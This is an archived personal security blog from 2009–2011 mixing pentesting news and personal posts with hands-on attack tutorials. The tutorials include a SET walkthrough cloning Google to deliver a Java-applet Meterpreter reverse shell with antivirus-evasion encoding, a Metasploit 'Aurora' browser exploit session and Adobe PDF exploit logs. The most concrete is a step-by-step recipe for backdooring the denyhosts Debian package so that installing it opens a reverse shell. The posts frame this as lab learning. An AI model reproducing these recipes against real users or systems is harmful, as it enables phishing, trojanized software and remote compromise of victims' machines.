Charles Watathi ---- comps stuff, mostly

Blog Has Moved

2011-05-27T23:13:00.000-07:00

The blog has moved to http://netsecuritystuff.wordpress.com/.

Another SEH tutorial

2011-02-15T00:50:00.000-08:00

I have written a simple seh tutorial on my wordpress blog,
kindly review it.

http://netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/

Facebook, so close yet so far

2011-02-15T00:23:00.000-08:00

Have https, then have it optional, seriously ?

GSM Security

2011-02-02T22:52:00.000-08:00

I had the priviledge of meeting Harald Welte a few days ago and it was really amazing. This is the guru at gsm security in the world. He is the author openbsc, openmoko and many other many cool opensource projects. He managed to spark an interest of gsm security and I am currently looking at this complex stuff by the side. Thanks Harald .

Installing virtualbox on backtrack 4 r2

2011-01-25T10:59:00.000-08:00

root@bt # echo "deb http://download.virtualbox.org/virtualbox/debian intrepid non-free" >> /etc/apt/sources.list

root@bt # wget -q http://download.virtualbox.org/virtualbox/debian/sun_vbox.asc -O- | sudo apt-key add -

root@bt # apt-get update

root@bt # apt-cache search virtualbox

root@bt # apt-get install virtualbox-3.1

Facebook and HTTPS

2011-01-24T22:43:00.000-08:00

Roughly two weeks I came across an article at /dev/random that there was a malicious java script injected on facebook in a Tunisia ISP that was capturing users user names and passwords http://blog.rootshell.be/2011/01/13/tunisia-tracks-users-with-javascript-injection/
Even if you were proxying through Tunisia, there could be a chance that your credentials were stolen. Today I woke up to read about how facebook dealt with the problem, guess what they used , https :) http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044
The register also confirmed this http://www.theregister.co.uk/2011/01/25/tunisia_facebook_password_slurping/
The question I always ask myself is why does facebook direct people to login to their http site while they have a https site where communication is encrypted? Even after the release of powerful tools such as wifizoo and firesheep which can be used to intercept http traffic with ease, why does the site with more than ~600 million people with accounts waiting for to use https as the default login page?
To avoid these issues, I always have a mozilla plugin, https-everywhere to force redirection to https. There is another plugin also for mozilla called force-tls that does the same thing. So do the bright thing, use https.
But even with https, be careful, awesome tools such as ssl-strip can be used with an man in the middle attack to strip out the ssl as the traffic. http://www.securitytube.net/Stripping-SSL-and-Sniffing-HTTPS-using-SSLstrip-video.aspx

Sriking Back

2011-01-17T23:11:00.001-08:00

Kindly look at this simple tool to use which you can use to "mess with hackers heads". Basically it starts a webserver on port 80 and creates random infinite urls. If somebody is running an automated web server scan against your webserver, it could be caught up in an infinite loop.

Usage:
Stop any webserver that could be running first, then initalise the script.

# python spidertrap.py

Then visit http:\\localhost with your browser and see.

You can read more about this tool here http://pauldotcom.com/wiki/index.php/Episode225

Also for fun, I found this image, "we found the weakest link". In a geek way its funny . Have a look at it. http://yfrog.com/hsfx3p

Cool stuff that has come out

2010-05-07T11:59:00.000-07:00

Well, new cool stuff that you should check out.

Metasploit reverse_https payload-http://blog.metasploit.com/2010/04/persistent-meterpreter-over-reverse.html

Offensive security hacking challenge-http://www.offensive-security.com/backtrack/how-strong-is-your-fu

New cool pentetsing vid by muts-href="http://www.offensive-security.com/videos/penetration-testing-in-the-real-world

hackin9 goes digital and free-href="http://download.hakin9.org/en/hakin9_04_2010_EN.pdf

ssh honeypots --cool ----href="http://pauldotcom.com/wiki/index.php/Episode194

Msfencode a Msfpayload Into An Existing Executable

2010-03-25T00:15:00.000-07:00

Totally awesome, and the executable still works and you get your shell :)

http://carnal0wnage.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html

Busting shells with the Digininja

2010-03-24T11:35:00.000-07:00

For the past two weeks i had the honor of attending hacking classes taught by Robin Wood, the author of cewl, and a ton of other cool tools. It was great meeting him and i got to learn some cool new hacks. He even gave a talk on HFC at the end of the lessons, someone donated two laptops. M organizing how to get them to Uganda. One of those things i loved is on msf> load sounds That really rocks. M spending this week reading the code for KreiosC2, a bot that can be controlled from twitter and trying to make it work. Thanks Robin.

Client Side exploits

2010-02-10T02:48:00.001-08:00

Client side attacks nowadys have become a major focus when performing penetration tests. You are sure once you forward an infected word document or attach malicious exe`s on a pdf, someone in the organisation will open the document. It has become practically impossible to defend against such attacks .

A while back Valsmith,Colim ames, and David kerb released a great way to perform such client attacks during the Blackhat and Defcon conferences with the Metaphish paper and code.
http://attackresearch.com/pub.html
This brought a whole new aspect of using signed java applets to attack clients and attaching metasploit payloads to pdf documents.

Since then David Kennedy with the Social Enginnering Framework and produced a marvelous automated tool called SET. SET allows you to perform all the above attacks and even more , one feature i love is the "website cloning feature", incorporate that with an arp redirect attack with ettercap, and you could pwn all the clients during a pentest. (with permission of course)Imagine cloning a site as common as "Google" or Facebook and then perfoming a java applet attack :) , total mass pwnage. On backtrack4 final, set is on the path /pentest/exploits/SET/set

Usage: Commands are in bold

I first downloaded google.com and moved it to /var/www/google/. a simple wget http://www.google.co.ke will do.
cp -r www.google.co.ke/ /var/www/
cd /var/www/
mv www.google.co.ke /var/www/google

cd /pentest/exploits/SET/
./set

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 2
Website Attack Vectors

1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.

Enter number: 3
Enter your current IP Address: 192.168.20.1

Enter the path to the website to be cloned: /var/www/google/
What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable Specify a path for your own executable

Enter choice (example 1-4): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Shikata_Ga_Nai is typically the best.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice (enter for default): 2

Usually 1 to 4 does the trick, if you get an error messsage, some encoders don't like more than one. Specify 0 if you want.

How many times do you want to encode the payload: 4

Enter the PORT of the listener: 4444

[-] Encoding the payload 4 times to get around pesky Anti-Virus. [-]

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
…………………………..
………………………..
resource (src/program_junk/meta_config)> use exploit/multi/handler
resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (src/program_junk/meta_config)> set LHOST 192.168.20.1
LHOST => 192.168.20.1
resource (src/program_junk/meta_config)> set LPORT 4444
LPORT => 4444
resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started reverse handler on 192.168.20.1:4444
[*] Starting the payload handler...

msf exploit(handler) >

The client goes to the fatefull page http://192.168.20.1 and gets the google search page and runs the java applet. You need to have java installed on client side.

msf exploit(handler) > [*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.20.1:4444 -> 192.168.20.4:1123)

msf exploit(handler) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.20.1:4444 -> 192.168.20.4:1123

Review a video here on the use of SET :
http://vimeo.com/groups/33570/videos/8450443

SET will introduce a version 0.4 soon, with this, you can even sign the java applets yourself.
Review a video here on the new version of SET :
http://vimeo.com/9198233
Metasploit on the other hand loaded to trunk a java_applet module, with an excellent rank. I have tested it against firefox, ie. It works wonders.

For the metasploit module, there is a good tutorial to follow through at paul dot com. The link is http://pauldotcom.com/wiki/index.php/Episode185 The tutorial is easy to understand and follow.

Try out the clone feature on SET that downloads the url you give it and embeds the java applet on it.

As for pdf attacks, the procedure is the same , try out the adobe attacks and especially the " Adobe PDF Embedded EXE Social Engineering" on SET and on metasploit it’s the exploit windows/fileformat/adobe_pdf_embedded_exe.

References:
http://www.attackresearch.com
http://www.social-engineer.org
http://pauldotcom.com
http://metasploit.com
Credits: David Kennedy, Valsmith, hdm and the metasploit crew, Carlos perez, pauldotcom crew,muts

Happy client side hacking

Aurora Attack

2010-01-17T21:36:00.000-08:00

By now, u know about Google being hacked by china. The exploit used has been ported to metasploit. It works also on XP SP2

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set SRVHOST 192.168.25.1
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST 192.168.25.1
msf exploit(ie_aurora) > exploit -j
msf exploit(ie_aurora) > exploit -j
msf exploit(ie_aurora) > [*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption to client 192.168.25.7
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.25.1:4444 -> 192.168.25.7:1196)
msf exploit(ie_aurora) > sessions

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.25.1:4444 -> 192.168.25.7:1196

msf exploit(ie_aurora) > sessions -i 1
msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

The God of Rainbows

2010-01-15T08:08:00.000-08:00

I promised God, i would tell of this, although many months late, i have to give Him praise. With the kind of speeds we have been having in Kenya ~20Kbps, i always wandered for many years how i would get my hands on rainbow tables ~100Gb. So i made a silent prayer,God answered me about 6 months ago, and i will be forever grateful. Something that could have taken me about 7 months to complete took an overnight. That night in July in 2009, God came through for me.The speeds bumped from 20Kbps to 5Mbps. To Him be the glory, honor and praise. Wonder what rainbow tables can crack, check the following link
http://cracker.offensive-security.com/

New Adobe 0 Day

2009-12-17T21:10:00.000-08:00

Metasploit has released a new adobe exploit adobe_media_player .
http://www.metasploit.com/redmine/projects/framework/repository/revisions/7882/entry/modules/exploits/windows/fileformat/adobe_media_newplayer.rb

I managed to ger meterpreter/reverse_tcp when running XP Sp3 with DEP turned off. When DEP was turned on, it was resulting to a DOS.

The offensive-security team have released a video for the same
http://www.offensive-security.com/blog/backtrack/bt4-adobe-0days-and-other-updates/

Adobe say the patch will come out in Jan 12.
http://blogs.adobe.com/asset/2009/12/background_on_reader_update_sh.html

Dont open suspicious pdf`s till then.

Merry Christmas.

Long trip (part 2)

2009-12-07T22:08:00.000-08:00

M back from Uganda. It was such a joy meeting Johnny and Jen. They are doing great work, currently setting up training lab and a cyber for the kids. I was pleased to see the new building for the cyber and Johnny shared what he plans to do. Its just amazing to see and be apart of what these great people are doing. They have sacrificed so much and i cant help but admire them more.I learnt one major lesson: its what you do with the what you have that matters. I will surely go back for a second visit. It was a really humbling meeting such a noble family. God bless u more and increase you. Thanks.
http://www.hackersforcharity.org/long-journey/charles-from-nairobi/

Long trip

2009-12-01T01:29:00.000-08:00

M going tomorrow on a small trip to visit Long. Yes Johnny Long. M a little scared inside. I have read all his books and he is the one person i look up to. i totally respect him for not only the elite skills but for the sacrifice he made to come to Uganda. He is not ashamed to love Christ :). I remember i even used his line in my final project "Thanks first to Christ without whom I am nothing." It will be a 15 hrs bus ride from where i live. I hope all goes well n i hope i also get a cool i hack charities t-shirt. will blog soon.

Attacking Mssql Servers with metasploit

2009-12-01T01:27:00.000-08:00

Thanks to darkoperator for this. Its so comprehesive and nicely laid out.Thumbs up.

http://www.darkoperator.com/blog/2009/11/27/attacking-mssql-with-metasploit.html

Fun with linux payloads and linux packages

2009-11-12T16:45:00.001-08:00

Just thot i should write a small tutorial on infecting .deb`s or .rpms with linux payloads.

First, download the package you are going to infect, for my test case m going to use denyhosts package.Its a simple package to drop ssh attacks. So from console type

apt-get install denyhosts

I then navigate to /var/cache/apt/archives/ on my backtrack4 machine, copy the denyhosts.deb package to another location for modification.On the new location extract the contents of the denyhosts.deb package by typing

dpkg -x denyhosts_2.6-5_all.deb test

This will create a folder called test with the contents of the package.A simple ls reveals the following folders:
etc usr var workdir

Go to msfpayload and generate yor payload. On my backtrack4 ,i prefer the linux/x86/shell/reverse_tcp.so on console,i type the following.

/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=4444 X > linux_payload

This creates a payload called linuxpayload in your current directory.

Create a folder called DEBIAN,and in the folder create two files . control and postinst. A simple control file is for defining the package. My control file looks like the one below.

Package: denyhosts
Version: 2.2
Section: system
Priority:Optional
Architecture: i386
Maintainer: Ubuntu dvelopers
Description: Denyhosts

For the postinst file, make the file executable. contents of the postinst file should contain the payload you want to execute and the path the payload will be copied. my postinst file looks like this.

#!/bin/sh
chmod 2755 /usr/share/denyhosts/linux_payload && /usr/share/denyhosts/linux_payload &

For this to work, copy your payload (linux_payload) to the extracted foler (test) and paste in in test/usr/share/denyhosts

now we are ready to build the debian package. From console,type the following

dpkg-deb --build test

It will create a malicious .deb package inside the test folder. Start the explot/multi/handler to handle your sessions. Scp the debian package to another machine and install it with the common dpkg -i [package_name] option. Immediately the package is installed, you should recieve a reverse shell on your machine.

I dont have any rpm based system at the moment but hope somebody tries it out .
Lesson:Dont install packages from people you dont trust.

Happy hacking.

LMAO!!!

2009-10-30T06:11:00.000-07:00

Today i was just idle, reading stuff from sans.org reading room, then i started idle browsing. Landed these two links that made my day.

http://www.darknet.org.uk/category/retards/

http://thepiratebay.org/legal

If you know of any other, please share.

Metasploit Unleashed

2009-09-23T02:44:00.000-07:00

The metasploit unleashed course is out

http://www.offensive-security.com/metasploit-unleashed/
Its a really good detailed course on basic and advanced features of metasploit. I have gone through it and i can say its great.

Oh and another thing, found this mesh plugin quite useful during info gathering. Greets to Andrew MacPherson and Roelf T.
http://www.social-engineer.org/blog/resources/
Get the mesh plugin at the end of the page.
Check out the vid here. http://www.paterva.com/mesh.mp4

Happy hunting for pizza . :). B good

What am i not doing right?

2009-09-18T23:53:00.000-07:00

Hi,
Its been around 1 month since colin ames and valsmith of metasploit released metasphish and adobe_pdf exploit (http://blog.attackresearch.com/publications/metaphish). been trying adobe_pdf exploit for almost a month, After i transfer the pdf file to windows, i still get a "c:\\windows\system32\cmd.exe /Q /C (if exist "%HOMEPATH%\My Documents\hi.pdf" (cd "%HOMEPATH%\My Documents"))&(if exist "%HOMEPATH%\Desktop\hi.pdf" (cd "%HOMEPATH%\Desktop"))&&(ren hi.pdf hi.exe&start hi.exe)" error and another error "system cannot find the specified file" on cmd. and my multi/handler doesnt pick up any reverse shells. M using adobe 9 on windows. M saving the pdf to my windows desktop.Any pointers will be appreciated. log is shown below. I have also tried out a new adobe_pdf module by peterhefley here. http://trac.metasploit.com/ticket/335.
Pointerz pliz.................

msf exploit(handler) > back
msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME hi.pdf
INFILENAME => hi.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Reading in 'hi.pdf'...
[*] Parseing 'hi.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_pdf_embedded_exe) >

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.20.1
LHOST => 192.168.20.1
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

Social Engineering Framework

2009-09-17T00:03:00.001-07:00

Well if you cant exploit a system, maybe u can exploit the users. This framework has been created by muts(creator of backtrack), Chris Hadnagy, hdm and others

Official website is http://www.social-engineer.org

Also check next tuesday for the new metasploit unleashed course at offensive security. seems juicy. Take a look at the teaser here

http://www.offensive-security.com/blog/offsec/metasploit-unleashed-information-security-training-at-its-best/

Happy hacking.

Microsoft Ftp Remote Exploit

2009-09-03T23:06:00.000-07:00

M bk, :). Kingcope on monday published a remote microsoft ftp exploit which affects windows 2000 sp4. Muts (creator of backtrack) modified and wrote a perl script for the same exploit. It can be found here. He also created a video showing the use of the exploit. Video is located here. On windows 2003, the exploit is rumoured to cause a dos. So patch up or be owned.

Metasploit New Advanced features

2009-03-27T06:12:00.000-07:00

Metasploit staff has been working overtime and have added some new kewl features. Some of these features include remote keystroke recording with meterpreter and also you can be able to capture a login credential for those nasty admins who have "cheeky" passwords. I have tried out both methods in my "Lab" and they work perfectly.
To get these new features, just do a svn update and in your "Lab" try out the new advanced meterpreter. Thanks to hdm and to the metasploit crew.
If you want the exact commands you can use, please refer to metasploit blog here here

Just thot i should also write a small tutorial on autopwn features. will be posting here soon:)

Information Gathering

2009-03-11T04:31:00.000-07:00

Quoting from Syngress Penetration Testers toolkit ,"Information gathering is the most misunderstood stage in the penetration testing process". This is the stage where we try to get as much information about the taget as possible. Thanks to Jonny Long for "Google hacking" and to Sensepost for comming up with tools like jarf-dns and dns-brute to bruteforce domains, but hats off to Roelf T and the team at Paterva for comming up with Maltego. At a first glance Maltego seems quite simple , but when you study it deeper and use it abit, it becomes the ultimate tool for information gathering. Maltego is able to create transforms for email address, sub domains, blogs,does information correlation and a lot more cools stuff. You must check it out. If you have no idea where to begin with maltego, these videos will do

http://ctas.paterva.com/view/Educational_videos
http://ctas.paterva.com/Maltego_Videos/Episode%201/
http://ctas.paterva.com/Maltego_Videos/Episode%202/
http://ctas.paterva.com/Maltego_Videos/Episode%203/
http://ctas.paterva.com/Maltego_Videos/Episode%204/

Web Application Testing

2009-03-05T22:02:00.000-08:00

Before performing a web application test, it is key that you first understand the basics of HTTP protocol and how it works to requests sent and to responses received.
You can go for the easier option of firing web application scanners like
Acunetix, Web Inspect , Nikto or any other web vulnerability scanner and they can do the work for you but even vulnerability scanners tend to miss some vulnerabilities.
If you dont have the basics with web application testing, I would suggest you first setup a simple lab with vulnerable web applications. Such applications include the famous Webgoat by OWASP, Foundstone Hacme series and there are also a few other good platforms you can use. Irongeek has documented a good list of vulnerable web applications here.

They are quite easy to setup and come with tutorials to guide you through every step, a great learning tool for the beginner and also the expert may see some things they overlook.
There are also some good books on Web application testing , a favourite of mine is by Wrox publishing: Pentesting for web applications. It covers well the basics to the expert stuff.
Fortunately OWASP have come up with a bundled application all in one live cd called the Lab Rat. It contains recent tools like Grendel, Maltego from the great Roelf T for information Gathering, and a lot of other cool tools. Check out the cd here

There are also several tools and plugins you can use during the web application process. My favourite tools are
Tamper Data- Firefox plugin to change on the fly data
Webscarab -Great proxy
w3af- Web application attack and auditing framework
Nikto- Web vuln scanner
Grendel
Show ip- Firefox plugin to show ip address

Take time to learn and not to rush through the tutorials offered. the thing is that you understand how its done , not just to break it.
Happy web pentesting learning.

welcome

2009-03-02T10:14:00.000-08:00

Hi. Mostly we will dwell on programming and security, but we may diverse.